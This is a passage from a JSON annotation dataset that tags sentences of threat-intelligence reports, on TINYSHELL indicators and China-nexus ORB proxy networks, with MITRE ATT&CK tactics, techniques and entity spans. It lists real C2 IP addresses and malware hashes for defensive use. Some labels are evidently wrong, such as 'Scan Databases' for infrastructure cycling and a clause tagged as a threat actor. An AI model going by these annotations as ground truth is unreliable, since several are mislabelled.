"end": 158, "label": "Infrastructure_Indicator" }, { "text": " C2 IP Address 4 2", "start": 202, "end": 220, "label": "Infrastructure_Indicator" }, { "text": "Deliver Malware and Steal Credentials", "start": 21, "end": 58, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s164-8c9b0e", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 164, "context_before": "Posting Campaigns to Deliver Malware and Steal Credentials By Google Threat Intelligence Group • 6-minute read [FILTERED_TABLES_START]\n11 | C2 IP Address 1 12 | C2 IP Address 2 13 | C2 IP Address 3 14 | C2 IP Address 4 2 | C2 Port Number 3 | C2 Network Interface appid | TINYSHELL | 2c89a18944d3a895bd6432415546635e", "sentence_text": "| 50520639cf77df0c15cc95076fac901e3d04b708 | 98380ec6bf4e03d3ff490cdc6c48c37714450930e4adf82e6e14d244d8373888 irad | TINYSHELL", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s165-0f4276", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 165, "context_before": "| 50520639cf77df0c15cc95076fac901e3d04b708 | 98380ec6bf4e03d3ff490cdc6c48c37714450930e4adf82e6e14d244d8373888 irad | TINYSHELL", "sentence_text": "| aac5d83d296df81c9259c9a533a8423a | 1a6d07da7e77a5706dd8af899ebe4daa74bbbe91", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s166-1631fe", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 166, "context_before": "| aac5d83d296df81c9259c9a533a8423a | 1a6d07da7e77a5706dd8af899ebe4daa74bbbe91", "sentence_text": "| 5bef7608d66112315eefff354dae42f49178b7498f994a728ae6203a8a59f5a2 jdosd |", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s167-bfc581", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 167, "context_before": "| 5bef7608d66112315eefff354dae42f49178b7498f994a728ae6203a8a59f5a2 jdosd |", "sentence_text": "TINYSHELL | 8023d01ffb7a38b582f0d598afb974ee", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s168-1909f9", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 168, "context_before": "TINYSHELL | 8023d01ffb7a38b582f0d598afb974ee", "sentence_text": "| 06a1f879da398c00522649171526dc968f769093 | c0ec15e08b4fb3730c5695fb7b4a6b85f7fe341282ad469e4e141c40ead310c3 lmpad |", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s169-1fc942", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 169, "context_before": "| 06a1f879da398c00522649171526dc968f769093 | c0ec15e08b4fb3730c5695fb7b4a6b85f7fe341282ad469e4e141c40ead310c3 lmpad |", "sentence_text": "TINYSHELL | 5724d76f832ce8061f74b0e9f1dcad90", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s170-5b9e8a", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 170, "context_before": "TINYSHELL | 5724d76f832ce8061f74b0e9f1dcad90", "sentence_text": "| f8697b400059d4d5082eee2d269735aa8ea2df9a | 5995aaff5a047565c0d7fe3c80fa354c40e7e8c3e7d4df292316c8472d4ac67a oemd | TINYSHELL", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s171-d8faa5", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 171, "context_before": "| f8697b400059d4d5082eee2d269735aa8ea2df9a | 5995aaff5a047565c0d7fe3c80fa354c40e7e8c3e7d4df292316c8472d4ac67a oemd | TINYSHELL", "sentence_text": "| e7622d983d22e749b3658600df00296d | cf7af504ef0796d91207e41815187a793d430d85 | 905b18d5df58dd6c16930e318d9574a2ad793ec993ad2f68bca813574e3d854b to | TINYSHELL", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s172-390511", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 172, "context_before": "| e7622d983d22e749b3658600df00296d | cf7af504ef0796d91207e41815187a793d430d85 | 905b18d5df58dd6c16930e318d9574a2ad793ec993ad2f68bca813574e3d854b to | TINYSHELL", "sentence_text": "| b9e4784fa0e6283ce6e2094426a02fce", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s173-b9faf2", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 173, "context_before": "| b9e4784fa0e6283ce6e2094426a02fce", "sentence_text": "| 01735bb47a933ae9ec470e6be737d8f646a8ec66", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s174-bb3663", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 174, "context_before": "| 01735bb47a933ae9ec470e6be737d8f646a8ec66", "sentence_text": "| e1de05a2832437ab70d36c4c05b43c4a57f856289224bbd41182deea978400ed oemd | TINYSHELL | bf80c96089d37b8571b5de7cab14dd9f | cec327e51b79cf11b3eeffebf1be8ac0d66e9529 | 3751997cfcb038e6b658e9180bc7cce28a3c25dbb892b661bcd1065723f11f7e lmpad | TINYSHELL | 3243e04afe18cc5e1230d49011e19899", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s175-b454a7", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 175, "context_before": "| e1de05a2832437ab70d36c4c05b43c4a57f856289224bbd41182deea978400ed oemd | TINYSHELL | bf80c96089d37b8571b5de7cab14dd9f | cec327e51b79cf11b3eeffebf1be8ac0d66e9529 | 3751997cfcb038e6b658e9180bc7cce28a3c25dbb892b661bcd1065723f11f7e lmpad | TINYSHELL | 3243e04afe18cc5e1230d49011e19899", "sentence_text": "| 2e9215a203e908483d04dfc0328651d79d35b54f | 7ae38a27494dd6c1bc9ab3c02c3709282e0ebcf1e5fcf59a57dc3ae56cfd13b4 TINYSHELL Command and Control server | 129.126.109.50:22 TINYSHELL Command and Control server | 116.88.34.184:22 TINYSHELL Command and Control server | 223.25.78.136:22 TINYSHELL Command and Control server | 45.77.39.28:22 TINYSHELL Command and Control server | 101.100.182.122:22 TINYSHELL Command and Control server | 118.189.188.122:22 TINYSHELL Command and Control server | 158.140.135.244:22 TINYSHELL Command and Control server | 8.222.225.8:22", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-94_mitre_report-p1-s1-dd629b", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "IOC Extinction?", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-94_mitre_report-p1-s2-03f648", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 2, "context_before": "IOC Extinction?", "sentence_text": "China-Nexus Cyber Espionage Actors Use ORB Networks to Raise Cost on Defenders | Google Cloud Blog Threat Intelligence IOC Extinction?", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-94_mitre_report-p1-s3-ffafbd", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 3, "context_before": "China-Nexus Cyber Espionage Actors Use ORB Networks to Raise Cost on Defenders | Google Cloud Blog Threat Intelligence IOC Extinction?", "sentence_text": "China-Nexus Cyber Espionage Actors Use ORB Networks to Raise Cost on Defenders May 23, 2024 Written by: Michael Raggi By using these mesh networks to conduct espionage operations, actors can disguise external traffic between command and control (C2) infrastructure and victim environments including vulnerable edge devices that are being exploited via zero-day vulnerabilities.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1090.003", "name": "Multi-hop Proxy" } ], "procedure": "Use of ORB mesh networks to disguise C2 traffic between attacker infrastructure and exploited edge devices", "entities": [ { "text": "China-Nexus Cyber Espionage Actors", "start": 0, "end": 34, "label": "ThreatActor" }, { "text": "command and control (C2) infrastructure", "start": 225, "end": 264, "label": "Infrastructure_Indicator" }, { "text": "vulnerable edge devices", "start": 299, "end": 322, "label": "Infrastructure_Indicator" }, { "text": "disguise external traffic", "start": 191, "end": 216, "label": "Action" }, { "text": "exploited via zero-day vulnerabilities", "start": 338, "end": 376, "label": "Action" } ] }, { "uid": "mitre-94_mitre_report-p1-s4-0deea9", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 4, "context_before": "China-Nexus Cyber Espionage Actors Use ORB Networks to Raise Cost on Defenders May 23, 2024 Written by: Michael Raggi By using these mesh networks to conduct espionage operations, actors can disguise external traffic between command and control (C2) infrastructure and victim environments including vulnerable edge devices that are being exploited via zero-day vulnerabilities.", "sentence_text": "These networks often use both rented VPS nodes in combination with malware designed to target routers so they can grow the number of devices capable of relaying traffic within compromised networks.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090.003", "name": "Multi-hop Proxy" } ], "procedure": "Use of malware-targeted routers and rented VPS nodes to expand C2 relay infrastructure", "entities": [ { "text": " malware designed to target routers", "start": 66, "end": 101, "label": "MalwareTool" }, { "text": "rented VPS nodes", "start": 30, "end": 46, "label": "Action" } ] }, { "uid": "mitre-94_mitre_report-p1-s5-58100f", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 5, "context_before": "These networks often use both rented VPS nodes in combination with malware designed to target routers so they can grow the number of devices capable of relaying traffic within compromised networks.", "sentence_text": "For even\nmore on ORB networks , listen to our latest The Defender's Advantage podcast.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-94_mitre_report-p1-s6-62fea1", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 6, "context_before": "For even\nmore on ORB networks , listen to our latest The Defender's Advantage podcast.", "sentence_text": "IOC Extinction and the Rise of ORB Networks", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-94_mitre_report-p1-s7-79f639", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 7, "context_before": "IOC Extinction and the Rise of ORB Networks", "sentence_text": "The cybersecurity industry has reported on the APT practice of ORB network usage in the past as well as on the functional implementation of these networks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-94_mitre_report-p1-s8-7eddda", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 8, "context_before": "The cybersecurity industry has reported on the APT practice of ORB network usage in the past as well as on the functional implementation of these networks.", "sentence_text": "Less discussed are the implications of broad ORB network usage by a multitude of China-nexus espionage actors, which has become more common over recent years.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1090.003", "name": "Multi-hop Proxy" } ], "procedure": "China-nexus espionage actors increasingly use ORB networks for operational stealth and traffic obfuscation.", "entities": [ { "text": " China-nexus espionage actors,", "start": 80, "end": 110, "label": "ThreatActor" }, { "text": "ORB network usage", "start": 45, "end": 62, "label": "Action" } ] }, { "uid": "mitre-94_mitre_report-p1-s9-2cefb2", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 9, "context_before": "Less discussed are the implications of broad ORB network usage by a multitude of China-nexus espionage actors, which has become more common over recent years.", "sentence_text": "They are not controlled by a single APT actor.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-94_mitre_report-p1-s10-7f58f7", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 10, "context_before": "They are not controlled by a single APT actor.", "sentence_text": "ORB networks create a network interface, administer a network of compromised nodes, and contract access to those networks to multiple APT actors that will use the ORB networks to carry out their own distinct espionage and reconnaissance.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090.003", "name": "Multi-hop Proxy" } ], "procedure": "Use of ORB networks to manage compromised nodes and enable espionage and reconnaissance for multiple APT actorsUse of ORB networks to manage compromised nodes and enable espionage and reconnaissance for multiple APT actors", "entities": [ { "text": "multiple APT actors", "start": 125, "end": 144, "label": "ThreatActor" }, { "text": "compromised nodes", "start": 65, "end": 82, "label": "Infrastructure_Indicator" }, { "text": "ORB networks ", "start": 0, "end": 13, "label": "Infrastructure_Indicator" }, { "text": "espionage and reconnaissance", "start": 208, "end": 236, "label": "Action" } ] }, { "uid": "mitre-94_mitre_report-p1-s11-1af4ce", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 11, "context_before": "ORB networks create a network interface, administer a network of compromised nodes, and contract access to those networks to multiple APT actors that will use the ORB networks to carry out their own distinct espionage and reconnaissance.", "sentence_text": "These networks are not controlled by APT actors using them, but rather are temporarily used by these APT actors often to deploy custom tooling more conventionally attributable to known China-nexus adversaries.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1090.003", "name": "Multi-hop Proxy" } ], "procedure": "APT actors temporarily use ORB proxy networks to deploy custom tooling while masking attribution to China-nexus adversaries", "entities": [ { "text": "APT actors", "start": 37, "end": 47, "label": "ThreatActor" }, { "text": "China-nexus adversaries", "start": 185, "end": 208, "label": "ThreatActor" }, { "text": "deploy custom tooling ", "start": 121, "end": 143, "label": "Action" }, { "text": "temporarily used", "start": 75, "end": 91, "label": "Action" } ] }, { "uid": "mitre-94_mitre_report-p1-s12-64414d", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 12, "context_before": "These networks are not controlled by APT actors using them, but rather are temporarily used by these APT actors often to deploy custom tooling more conventionally attributable to known China-nexus adversaries.", "sentence_text": "ORB network infrastructure has a short lifespan and IOC extinction is accelerating:\nBased on Mandiant’s regular tracking of ORB networks, the lifespan of an IPv4 address associated with an ORB node can be in an ORB network for as few as 31 days.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1090.003", "name": "Multi-hop Proxy" } ], "procedure": "Rapid rotation of ORB infrastructure to evade detection and shorten IOC lifespan", "entities": [ { "text": " ORB networks", "start": 123, "end": 136, "label": "Infrastructure_Indicator" }, { "text": "IPv4 address associated with an ORB node", "start": 157, "end": 197, "label": "Infrastructure_Indicator" }, { "text": "IOC extinction", "start": 52, "end": 66, "label": "Action" } ] }, { "uid": "mitre-94_mitre_report-p1-s13-c3539b", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 13, "context_before": "ORB network infrastructure has a short lifespan and IOC extinction is accelerating:\nBased on Mandiant’s regular tracking of ORB networks, the lifespan of an IPv4 address associated with an ORB node can be in an ORB network for as few as 31 days.", "sentence_text": "Each ORB network has different practices for cycling infrastructure as part of their ORB networks infrastructure.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1090.003", "name": "Multi-hop Proxy" } ], "procedure": "Cycling ORB network infrastructure frequently to evade detection", "entities": [ { "text": " ORB networks ", "start": 84, "end": 98, "label": "Infrastructure_Indicator" }, { "text": "cycling infrastructure", "start": 45, "end": 67, "label": "Action" } ] }, { "uid": "mitre-94_mitre_report-p1-s14-2f4df4", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 14, "context_before": "Each ORB network has different practices for cycling infrastructure as part of their ORB networks infrastructure.", "sentence_text": "However, a competitive differentiator among ORB network contractors in China appears to be their ability to cycle significant percentages of their compromised or leased infrastructure on a monthly basis.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1596.005", "name": "Scan Databases" } ], "procedure": "Rapid cycling of compromised or leased infrastructure by ORB network contractors in China", "entities": [ { "text": "to cycle significant percentages of their compromised or leased infrastructure on a monthly basis.", "start": 105, "end": 203, "label": "ThreatActor" }, { "text": " ORB network contractors in China ", "start": 43, "end": 77, "label": "ThreatActor" } ] }, { "uid": "mitre-94_mitre_report-p1-s15-4ab10b", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 15, "context_before": "However, a competitive differentiator among ORB network contractors in China appears to be their ability to cycle significant percentages of their compromised or leased infrastructure on a monthly basis.", "sentence_text": "Therefore, simply blocking infrastructure observed in association with ORB network behavior is not as effective as blocking C2 infrastructure would have been in the period between 2005 and 2016.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1090.003", "name": "Multi-hop Proxy" } ], "procedure": "Cycling of ORB infrastructure reduces effectiveness of infrastructure-based blocking", "entities": [ { "text": " blocking infrastructure", "start": 17, "end": 41, "label": "Action" }, { "text": " C2 infrastructure", "start": 123, "end": 141, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-94_mitre_report-p1-s16-68dfb1", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 16, "context_before": "Therefore, simply blocking infrastructure observed in association with ORB network behavior is not as effective as blocking C2 infrastructure would have been in the period between 2005 and 2016.", "sentence_text": "As a result, IOC extinction is accelerating and the shelf life of network indicators is decreasing.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1090.003", "name": "Multi-hop Proxy" } ], "procedure": "Rapid cycling of attacker infrastructure accelerates IOC extinction and reduces the usefulness of network indicators.", "entities": [ { "text": "network indicators ", "start": 66, "end": 85, "label": "Infrastructure_Indicator" }, { "text": " IOC extinction", "start": 12, "end": 27, "label": "Action" } ] }, { "uid": "mitre-94_mitre_report-p1-s17-75250b", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 17, "context_before": "As a result, IOC extinction is accelerating and the shelf life of network indicators is decreasing.", "sentence_text": "Attributing espionage operations cannot rely on network infrastructure alone:\nFrom a defender’s perspective, the egress IP address observed in relation to an APT attack has for years been a key artifact used to research an intrusion's attribution.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1090.003", "name": "Multi-hop Proxy" } ], "procedure": "Frequent infrastructure changes reduce attribution effectiveness based on egress IPs", "entities": [ { "text": "APT attack", "start": 158, "end": 168, "label": "ThreatActor" }, { "text": "egress IP address", "start": 113, "end": 130, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-94_mitre_report-p1-s18-882c72", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 18, "context_before": "Attributing espionage operations cannot rely on network infrastructure alone:\nFrom a defender’s perspective, the egress IP address observed in relation to an APT attack has for years been a key artifact used to research an intrusion's attribution.", "sentence_text": "In the case of China-nexus attacks, attribution is growing both more challenging and more non-specific.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-94_mitre_report-p1-s19-cdb5c3", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 19, "context_before": "In the case of China-nexus attacks, attribution is growing both more challenging and more non-specific.", "sentence_text": "Infrastructure or the compromised router device communicating with a victim environment may now be identifiable to a particular ORB network, while the actor using that ORB network to carry out the attack may be unclear and require investigation of the complex tools and tactics observed as part of an intrusion.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090.003", "name": "Multi-hop Proxy" } ], "procedure": "Attackers use compromised routers as ORB proxy nodes to communicate with victim environments while obscuring attribution", "entities": [ { "text": "compromised router device", "start": 22, "end": 47, "label": "Infrastructure_Indicator" }, { "text": "victim environment", "start": 69, "end": 87, "label": "Infrastructure_Indicator" }, { "text": " ORB network", "start": 127, "end": 139, "label": "Infrastructure_Indicator" }, { "text": "carry out the attack ", "start": 183, "end": 204, "label": "Action" } ] }, { "uid": "mitre-94_mitre_report-p1-s20-524c9d", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 20, "context_before": "Infrastructure or the compromised router device communicating with a victim environment may now be identifiable to a particular ORB network, while the actor using that ORB network to carry out the attack may be unclear and require investigation of the complex tools and tactics observed as part of an intrusion.", "sentence_text": "These networks allow actors to egress from devices that have a geographic proximity to targeted enterprises, which allows traffic to blend in or otherwise not be anomalous when being reviewed by analysts or operational personnel making risk-based access decisions.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1090.003", "name": "Multi-hop Proxy" } ], "procedure": "Egressing through geographically proximate ORB nodes to blend traffic and evade detection", "entities": [ { "text": " actors", "start": 20, "end": 27, "label": "ThreatActor" }, { "text": "egress from devices that have a geographic proximity to targeted enterprises", "start": 31, "end": 107, "label": "Action" } ] }, { "uid": "mitre-94_mitre_report-p1-s21-3d2339", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 21, "context_before": "These networks allow actors to egress from devices that have a geographic proximity to targeted enterprises, which allows traffic to blend in or otherwise not be anomalous when being reviewed by analysts or operational personnel making risk-based access decisions.", "sentence_text": "One such example would be traffic from a residential ISP that is in the same geographic location as the target that is regularly used by employees and would be less likely to get picked up for manual review.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1090.003", "name": "Multi-hop Proxy" } ], "procedure": "Routing traffic through nearby residential ISP infrastructure to blend in and avoid detection", "entities": [ { "text": " residential ISP", "start": 40, "end": 56, "label": "Infrastructure_Indicator" }, { "text": "manual review.", "start": 193, "end": 207, "label": "Action" } ] }, { "uid": "mitre-94_mitre_report-p1-s22-1eadc1", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 22, "context_before": "One such example would be traffic from a residential ISP that is in the same geographic location as the target that is regularly used by employees and would be less likely to get picked up for manual review.", "sentence_text": "The weaponization phase of the cyber kill chain now appears to be administered by third-party providers, complicating the definitive attribution of cyberattacks using network indicators and increasing the difficulty of detecting anomalous traffic.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1090.003", "name": "Multi-hop Proxy" } ], "procedure": "Outsourcing weaponization and infrastructure to third-party providers to obscure attribution and avoid detection", "entities": [ { "text": "third-party providers", "start": 82, "end": 103, "label": "ThreatActor" }, { "text": "network indicators", "start": 167, "end": 185, "label": "Infrastructure_Indicator" }, { "text": " weaponization phase", "start": 3, "end": 23, "label": "Action" }, { "text": "anomalous traffic", "start": 229, "end": 246, "label": "Action" } ] }, { "uid": "mitre-94_mitre_report-p1-s23-e4a9b8", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 23, "context_before": "The weaponization phase of the cyber kill chain now appears to be administered by third-party providers, complicating the definitive attribution of cyberattacks using network indicators and increasing the difficulty of detecting anomalous traffic.", "sentence_text": "The Anatomy of an ORB Network ORB networks are always made up of network infrastructure nodes.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-94_mitre_report-p1-s24-3bb0ac", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 24, "context_before": "The Anatomy of an ORB Network ORB networks are always made up of network infrastructure nodes.", "sentence_text": "These nodes can be compromised routers, leased VPS devices, or often a mixture of both.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-94_mitre_report-p1-s25-832c5e", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 25, "context_before": "These nodes can be compromised routers, leased VPS devices, or often a mixture of both.", "sentence_text": "While earlier commercial incarnations of ORB networks date back to 2016, the modern incarnation of networks like ORB1 / ORBWEAVER can be tracked back to at least 2020.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-94_mitre_report-p1-s26-99c5a2", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 26, "context_before": "While earlier commercial incarnations of ORB networks date back to 2016, the modern incarnation of networks like ORB1 / ORBWEAVER can be tracked back to at least 2020.", "sentence_text": "The nodes in any given ORB network are usually distributed globally across the world and are not geographically specific to any one location.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-94_mitre_report-p1-s27-cb2eec", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 27, "context_before": "The nodes in any given ORB network are usually distributed globally across the world and are not geographically specific to any one location.", "sentence_text": "ORB network administrators rely on ASN providers in different parts of the world to reduce exposure or dependence on any one nation’s internet infrastructure.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1090.003", "name": "Multi-hop Proxy" } ], "procedure": "Leveraging globally distributed ASN providers to reduce exposure and dependency on a single nation’s infrastructure", "entities": [ { "text": "ORB network administrators", "start": 0, "end": 26, "label": "ThreatActor" }, { "text": " ASN providers ", "start": 34, "end": 49, "label": "Infrastructure_Indicator" }, { "text": " reduce exposure or dependence", "start": 83, "end": 113, "label": "Action" } ] }, { "uid": "mitre-94_mitre_report-p1-s28-5ccf97", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 28, "context_before": "ORB network administrators rely on ASN providers in different parts of the world to reduce exposure or dependence on any one nation’s internet infrastructure.", "sentence_text": "An example of global distribution of an ORB network can be seen as follows in what Mandiant tracks as ORB3 or SPACEHOP, a very active network leveraged by multiple China-nexus threat actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-94_mitre_report-p1-s29-344de4", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 29, "context_before": "An example of global distribution of an ORB network can be seen as follows in what Mandiant tracks as ORB3 or SPACEHOP, a very active network leveraged by multiple China-nexus threat actors.", "sentence_text": "The high volume of APT-related traffic through globally distributed nodes indicates that this network is utilized to target a wide array of geographic targets colocated in the geographies of observed exit nodes.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-94_mitre_report-p1-s30-4223fa", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 30, "context_before": "The high volume of APT-related traffic through globally distributed nodes indicates that this network is utilized to target a wide array of geographic targets colocated in the geographies of observed exit nodes.", "sentence_text": "These geographies have been observed as targets of APT15 and UNC2630 (a cluster of activity with suspected links to APT5) and have previously been observed using this network.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1090.003", "name": "Multi-hop Proxy" } ], "procedure": "APT15 and UNC2630 use ORB networks to target geographically aligned victims while obscuring attribution", "entities": [ { "text": "APT15 and UNC2630 (a cluster of activity with suspected links to APT5)", "start": 51, "end": 121, "label": "ThreatActor" }, { "text": " using this network", "start": 155, "end": 174, "label": "Action" } ] }, { "uid": "mitre-94_mitre_report-p1-s31-55a89b", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 31, "context_before": "These geographies have been observed as targets of APT15 and UNC2630 (a cluster of activity with suspected links to APT5) and have previously been observed using this network.", "sentence_text": "This network also diversifies its nodes by registering VPS-based devices with multiple commercially available Autonomous System providers.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1090.003", "name": "Multi-hop Proxy" } ], "procedure": "Diversifying VPS nodes across multiple AS providers to evade attribution and blocking", "entities": [ { "text": "diversifies its nodes ", "start": 18, "end": 40, "label": "Action" }, { "text": "VPS-based devices", "start": 55, "end": 72, "label": "Infrastructure_Indicator" }, { "text": "Autonomous System providers.", "start": 110, "end": 138, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-94_mitre_report-p1-s32-4fd56e", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 32, "context_before": "This network also diversifies its nodes by registering VPS-based devices with multiple commercially available Autonomous System providers.", "sentence_text": "Top 10 Autonomous System providers and percent composition of ORB3 / SPACEHOP network ORB Network Classifications provisioned networks , which are made up of commercially leased VPS space that are managed by ORB network administrators, or they can be non-provisioned networks , which are often made up of compromised and end-of-life router and IoT devices.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-94_mitre_report-p1-s33-00c890", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 33, "context_before": "Top 10 Autonomous System providers and percent composition of ORB3 / SPACEHOP network ORB Network Classifications provisioned networks , which are made up of commercially leased VPS space that are managed by ORB network administrators, or they can be non-provisioned networks , which are often made up of compromised and end-of-life router and IoT devices.", "sentence_text": "It is also possible for an ORB network to be a hybrid network combining both leased VPS devices and compromised devices.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-94_mitre_report-p1-s34-cfb419", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 34, "context_before": "It is also possible for an ORB network to be a hybrid network combining both leased VPS devices and compromised devices.", "sentence_text": "The type of threat actor organization does not appear to limit which type of network threat actors utilize, despite historic indications that military-related entities have preferred procured networks in the past.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-94_mitre_report-p1-s35-dd187c", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 35, "context_before": "The type of threat actor organization does not appear to limit which type of network threat actors utilize, despite historic indications that military-related entities have 